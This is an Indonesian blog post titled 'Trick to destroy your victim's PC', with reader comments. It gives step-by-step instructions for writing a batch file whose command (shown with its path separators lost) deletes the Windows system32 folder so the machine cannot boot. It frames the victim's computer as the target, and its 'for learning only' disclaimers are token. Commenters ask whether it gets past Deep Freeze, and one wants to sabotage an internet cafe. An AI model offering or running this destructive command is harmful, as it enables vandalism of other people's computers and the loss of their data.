Trick Menghancurkan Pc Korbanmu


https://indonesianhackers.files.wordpress.com/2011/04/computer_hack_id_theft.jpg?w=300

ne cuma mau share ini aja kok
jangan di tiru yah,,…..
WARNING
saya disini menjelaskan untuk membuat sebuah file yang menghancurkan pc korban Anda
saya tidak bertanggung jawab atas kerusakan yang disebabkan oleh file ini.

CATATAN: jangan coba-coba (HANYA UNTUK TUJUAN PEMBELAJARAN SAJA )

ok langsung saja ke caranya :

1. Buka Notepad
2. lalu tulis perintah berikut: –

del c:WINDOWSsystem32*.*/q

3. Simpan notepad tersebut dengan ekstensi “.bat atau .cmd ”
4. PENTING : Jangan klik dua kali file tersebut kalau gak mau dalam kesulitan. Mengapa ? file barusan yang kamu ciptakan menghapus semua file dari komputer anda LOL, folder system32 dan ketika kamu restart pc mu tidak akan mulai coz sistem tidak dapat menemukan file dalam folder system32 yang diperlukan pada saat booting.                             5. Anda juga dapat menguji di atas dengan membuat folder palsu membiarkan rasa
windows1 di C: \. Menyalin beberapa file lama di dalamnya dan hanya mengikuti atau meniru nya saja
atas command.karena mengklik file yang kamu ganda atau copy bat atau cmd semua file otomatis bisa dihapus.               6. kamu dapat mencoba file ini di komputer manapun satu `s (tapi. ini menyebabkan menyebabkan kerusakan pada
komputer, jadi berpikir lagi sebelum mencoba ini di pc siapa pun apalagi di pc ente sendiri )
————————————————-
ingat ini cuma buat share ilmu aja sambil belajar no untuk yang macam2

Perihal Wllhack CSO Megaxus
IM

2 Responses to Trick Menghancurkan Pc Korbanmu

  1. chornos13 mengatakan:

    Misalnya Kalo kita pakai Deep Frezze Gimana Masih fungsi ngak TUh

  2. Ifan♂ mengatakan:

    .Iya Kalo Sebuah Warnet Itu Pakai Deep Frezze Gimana?
    .Saya Mau Ngerjain Warnet Yang Pelit (Ada Deep Frezze + Anti Executable)

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: